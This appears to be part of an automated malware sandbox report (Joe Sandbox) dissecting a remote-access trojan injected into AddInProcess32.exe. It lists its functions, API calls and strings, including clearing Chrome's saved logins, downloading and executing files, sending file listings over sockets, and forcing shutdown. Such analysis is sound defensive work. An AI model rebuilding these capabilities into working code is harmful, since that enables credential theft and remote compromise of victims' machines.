                                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                • API String ID: 2127411465-314212984
                                                                                                • Opcode ID: f0dc0ac158a4597904f9d4bd83d4ea492494a4f5769bb014f944d07396ae78d4
                                                                                                • Instruction ID: cc57822c2a7f940fffebe33daf0632284ddc1748a3b8d5e961f42c670a34d5b4
                                                                                                • Opcode Fuzzy Hash: f0dc0ac158a4597904f9d4bd83d4ea492494a4f5769bb014f944d07396ae78d4
                                                                                                • Instruction Fuzzy Hash: D1B1F671A0430066CA14BB76DC579AF36A89F91748F40053FB906671E2EE7D8A48C6DA
                                                                                                Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                • API String ID: 1589313981-2876530381
                                                                                                • Opcode ID: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                                                                • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                • Opcode Fuzzy Hash: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                                                                • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                Strings
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                • UserProfile, xrefs: 0040BA59
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                • API String ID: 2018770650-1062637481
                                                                                                • Opcode ID: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                                • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                • Opcode Fuzzy Hash: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                                • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                • GetLastError.KERNEL32 ref: 004179D8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 3534403312-3733053543
                                                                                                • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00409293
                                                                                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                  • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
                                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                • String ID:
                                                                                                • API String ID: 1824512719-0
                                                                                                • Opcode ID: cfd56bb2f0bafcfd4d7d26af1d1556629142b5e3114abe265a3ae1cdad786b8f
                                                                                                • Instruction ID: 7a56ba3823c44b8d3dadbfeca74e3365e00ee059376cf1b582d15bdd70b30780
                                                                                                • Opcode Fuzzy Hash: cfd56bb2f0bafcfd4d7d26af1d1556629142b5e3114abe265a3ae1cdad786b8f
                                                                                                • Instruction Fuzzy Hash: 8AB19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                                Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                • String ID:
                                                                                                • API String ID: 276877138-0
                                                                                                • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                Function 00419B86 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$CreateFirstNext
                                                                                                • String ID: HSG$`XG$`XG
                                                                                                • API String ID: 341183262-3993355375
                                                                                                • Opcode ID: 9c9a0669a71b4f33c5daa822f8c57c44e5966a1ff3984ab844f5db61bfc19107
                                                                                                • Instruction ID: 3e2b8d556a8fbdbb081ab446324185a4f3aab8361380fbf0113865ad31d0729a
                                                                                                • Opcode Fuzzy Hash: 9c9a0669a71b4f33c5daa822f8c57c44e5966a1ff3984ab844f5db61bfc19107
                                                                                                • Instruction Fuzzy Hash: 588151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00452555
                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0045257E
                                                                                                • GetACP.KERNEL32 ref: 00452593
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                • String ID: SETTINGS
                                                                                                • API String ID: 3473537107-594951305
                                                                                                • Opcode ID: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                                                                                • Instruction ID: e87eb13c1a863bb520e8110b03cd0e44f0123e9e346c2db4eb51eb31bea7c0b5
                                                                                                • Opcode Fuzzy Hash: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                                                                                • Instruction Fuzzy Hash: 23E01276600B21EBDB211FB1AC8CD467F25E7C9B533140075FA0582271CB758840DA58
                                                                                                Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                                • String ID:
                                                                                                • API String ID: 1157919129-0
                                                                                                • Opcode ID: af6a0ae420fa4b0c531d5284d970621d696702494a03b6a4d54f92d75e0779a6
                                                                                                • Instruction ID: 095255599cc0af9be2c5710cd9f248f54336688560ad7ccdcde9a73cf5c292f5
                                                                                                • Opcode Fuzzy Hash: af6a0ae420fa4b0c531d5284d970621d696702494a03b6a4d54f92d75e0779a6
                                                                                                • Instruction Fuzzy Hash: CB813C729001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                Function 00452690 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 0045279C
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0045286D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                • String ID:
                                                                                                • API String ID: 745075371-0
                                                                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                • String ID:
                                                                                                • API String ID: 1771804793-0
                                                                                                • Opcode ID: 6a5add45ef859563d959a98ce479c279f9ec06b8e0bd107cefd8dc89a421ab56
                                                                                                • Instruction ID: 967e03bdddb214c30410211942a515ee3c29859e80101891d5c5db132fd2cd64
                                                                                                • Opcode Fuzzy Hash: 6a5add45ef859563d959a98ce479c279f9ec06b8e0bd107cefd8dc89a421ab56
                                                                                                • Instruction Fuzzy Hash: 94517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB99
                                                                                                Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                                                                                                • API String ID: 2825088817-2881483049
                                                                                                • Opcode ID: a4decb2415a0649306c596a711eb8ba019e5cb9b1f344aa0c5d0a38af2be72d2
                                                                                                • Instruction ID: e12f74d6213dd3660153607da8c9b98f7978e2d251169c1aa1e307be856b925d
                                                                                                • Opcode Fuzzy Hash: a4decb2415a0649306c596a711eb8ba019e5cb9b1f344aa0c5d0a38af2be72d2
                                                                                                • Instruction Fuzzy Hash: 1461C471A0830166CA14FB76C8569BE37A59F81758F40093FF9427B2D2EE3C9905C79B
                                                                                                Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstNextsend
                                                                                                • String ID: hPG$hPG
                                                                                                • API String ID: 4113138495-4177492676
                                                                                                • Opcode ID: 1be34f89ea814bd65e76ce40df8d3f913d103fba2d245ec84d986e5d9032f1e8
                                                                                                • Instruction ID: abfa5a3658aec55442980c0effbd4670719d50d4d7308f226e3cac976b3f196c
                                                                                                • Opcode Fuzzy Hash: 1be34f89ea814bd65e76ce40df8d3f913d103fba2d245ec84d986e5d9032f1e8
                                                                                                • Instruction Fuzzy Hash: CB2195315082019BC314FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA09C65B
                                                                                                Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNELBASE(?,004674C8,00000000,?,00000000,00000000,00475300,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137E1
                                                                                                  • Part of subcall function 004137AA: RegCloseKey.KERNELBASE(?,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                                                                • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                • Opcode Fuzzy Hash: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                                                                • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                Function 0041CA6D Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNELBASE(?,004674C8,00000000,?,00000000,00000000,00475300,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137E1
                                                                                                  • Part of subcall function 004137AA: RegCloseKey.KERNELBASE(?,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: 44ea0df9bd10d1232a8db12fadab67e0168899acaa20bfaa619f1365e862af88
                                                                                                • Instruction ID: 1d4fccf664b116fd7e9026c1daa93839c24cbfeedf45b0e65449f5778d70c30d
                                                                                                • Opcode Fuzzy Hash: 44ea0df9bd10d1232a8db12fadab67e0168899acaa20bfaa619f1365e862af88
                                                                                                • Instruction Fuzzy Hash: DBF0C272BC421022D82931B96DAFBFE18058742F61F15412BF302652CAD4CE6A81428F
                                                                                                Function 00451D58 Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00451E3A
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451F7B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 4212172061-0
                                                                                                • Opcode ID: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
                                                                                                • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                                • Opcode Fuzzy Hash: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
                                                                                                • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                                Function 0044942D Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0044943D
                                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                • GetTimeZoneInformation.KERNEL32 ref: 0044944F
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 004494C7
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 004494F4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                • String ID:
                                                                                                • API String ID: 806657224-0
